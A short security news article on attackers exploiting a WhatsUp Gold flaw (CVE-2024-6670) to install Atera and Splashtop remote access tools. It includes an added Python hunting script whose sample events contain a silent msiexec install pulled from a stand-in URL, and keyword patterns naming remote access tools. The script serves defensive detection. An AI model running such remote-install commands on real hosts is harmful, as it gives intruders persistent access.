Vulnerability in WhatsUp Gold exploited within hours of public disclosure

September 15, 2024




Article Summary

Key Points:

  • Malicious actors are exploiting a critical flaw in Progress WhatsUp Gold just hours after a PoC release.
  • The vulnerabilities allow attackers to retrieve encrypted passwords and gain persistence on Windows hosts.

Malicious actors are taking advantage of a critical flaw in Progress Software WhatsUp Gold, which allows unauthenticated attackers to retrieve encrypted passwords. The attacks began just five hours after a proof-of-concept (PoC) exploit was released for CVE-2024-6670 by security researcher Sina Kheirkhah. Progress had patched the vulnerabilities earlier in August, but some organizations were unable to apply the patches quickly enough, leading to immediate incidents following the PoC’s publication.

The observed attacks bypassed WhatsUp Gold authentication to abuse the Active Monitor PowerShell Script functionality, which was then used to download remote access tools for persistence on Windows hosts. Trend Micro researchers noted the use of tools like Atera Agent and Splashtop Remote. While no follow-on exploitation actions have been detected, the involvement of ransomware actors is suspected.
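
One way to hunt for the activity described above, as an added example that is not from the article or from Trend Micro: it flags process-creation events in which the WhatsUp Gold poller spawns an installer or shell whose command line carries a remote URL or names one of the remote access tools mentioned. The poller process name `nmpoller.exe`, the event field names and the sample events are assumptions constructed for illustration.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

# Assumption: name of the WhatsUp Gold polling process that hosts Active
# Monitor scripts. The article does not name it; adjust to your install.
POLLER_IMAGES = {"nmpoller.exe"}
# Child processes able to fetch or install software.
INSTALLER_IMAGES = {"msiexec.exe", "powershell.exe", "pwsh.exe", "cmd.exe"}
# Remote access tools named in the article.
RAT_KEYWORDS = ("atera", "splashtop")
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

def score_event(event):
    """Return the reasons a process-creation event looks suspicious."""
    parent = basename(event.get("parent_image", "")).lower()
    if parent not in POLLER_IMAGES:
        return []  # only children of the poller are in scope
    image = basename(event.get("image", "")).lower()
    cmdline = event.get("command_line", "")
    reasons = []
    if image in INSTALLER_IMAGES:
        reasons.append(f"poller spawned {image}")
    if URL_RE.search(cmdline):
        reasons.append("command line references a remote URL")
    hits = [k for k in RAT_KEYWORDS if k in cmdline.lower()]
    if hits:
        reasons.append("remote access tool named: " + ", ".join(hits))
    return reasons

def triage(events, threshold=2):
    """Return (event id, reasons) for events meeting the threshold."""
    scored = ((ev["id"], score_event(ev)) for ev in events)
    return [(eid, why) for eid, why in scored if len(why) >= threshold]

# Constructed sample events, shaped like Sysmon Event ID 1 fields.
SAMPLE_EVENTS = [
    {"id": 1, "parent_image": r"C:\WUG\NmPoller.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "command_line": "msiexec.exe /i https://example.invalid/atera-setup.msi /qn"},
    {"id": 2, "parent_image": r"C:\WUG\NmPoller.exe",
     "image": r"C:\Windows\System32\PING.EXE", "command_line": "ping -n 1 10.0.0.5"},
    {"id": 3, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "command_line": "msiexec.exe /i https://example.invalid/splashtop.msi"},
    {"id": 4, "parent_image": r"C:\WUG\NmPoller.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -File check_disk.ps1"},
]
```

The threshold of two reasons keeps a poller that merely launches a local PowerShell monitor script (event 4) out of the results while still surfacing a remote install (event 1).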

This is not the first time vulnerabilities in WhatsUp Gold have been actively weaponized in the wild. In a similar incident last month, exploitation attempts were made against another critical bug in the software. Trend Micro also reported exploitation of a security flaw in Atlassian Confluence to deliver the Godzilla web shell.

The disclosure of these attacks highlights the importance of patch management and proactive security measures to protect organizations from opportunistic threats exploiting known vulnerabilities.

